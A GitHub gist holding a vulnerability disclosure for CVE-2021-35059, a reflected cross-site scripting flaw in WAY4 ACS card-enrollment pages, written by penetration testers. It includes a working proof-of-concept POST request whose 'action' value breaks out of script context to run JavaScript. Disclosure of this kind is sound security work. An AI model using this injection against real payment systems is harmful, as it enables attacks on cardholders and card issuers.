-
-
Save exviry/560fededd1e44b7cced483d8ca8c362e to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CVE-2021-35059 | |
------------------------------------------ | |
A reflected cross-site scripting (XSS) vulnerability in WAY4 ACS before 1.2.278-2693 allows remote attackers to inject arbitrary JavaScript or HTML code via the 'action' parameter in a 3DS card enrollment page. | |
------------------------------------------ | |
[Additional Information] | |
During penetration testing of our clients' infrastructure, we discovered vulnerabilities in a third-party software - WAY4 ACS. | |
Application writes data of the 'action' POST-parameter to a page /way4acs/enroll without any sanitization which may lead to JavaScript or HTML-code execution. | |
Request example which trigger XSS: | |
POST /way4acs/enroll HTTP/1.1 | |
Host: application | |
Connection: close | |
Content-Length: 79 | |
Content-Type: application/x-www-form-urlencoded | |
action=canary"==="canary"))%0aa='';%0a}%0aalert("XSS");%0aif+(el){%0aif(("check | |
------------------------------------------ | |
[VulnerabilityType Other] | |
Cross-site scripting (XSS) | |
------------------------------------------ | |
[Vendor of Product] | |
OpenWay Group | |
------------------------------------------ | |
[Affected Product Code Base] | |
WAY4 ACS before V.1.2.278-2693 | |
------------------------------------------ | |
[Has vendor confirmed or acknowledged the vulnerability?] | |
True | |
------------------------------------------ | |
[Affected Component] | |
/way4acs/enroll | |
----------------------------------------- | |
[Attack Type] | |
Remote | |
------------------------------------------ | |
[Discoverer] | |
Aleksey Shupletsov | |
Deiteriy Co. Ltd. (https://deiteriylab.com/) | |
------------------------------------------ | |
[Reference] | |
OpenWay Group (https://www.openwaygroup.com/way4-platform) | |
Aleksey Shupletsov / Deiteriy Co. Ltd. (https://deiteriylab.com/) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment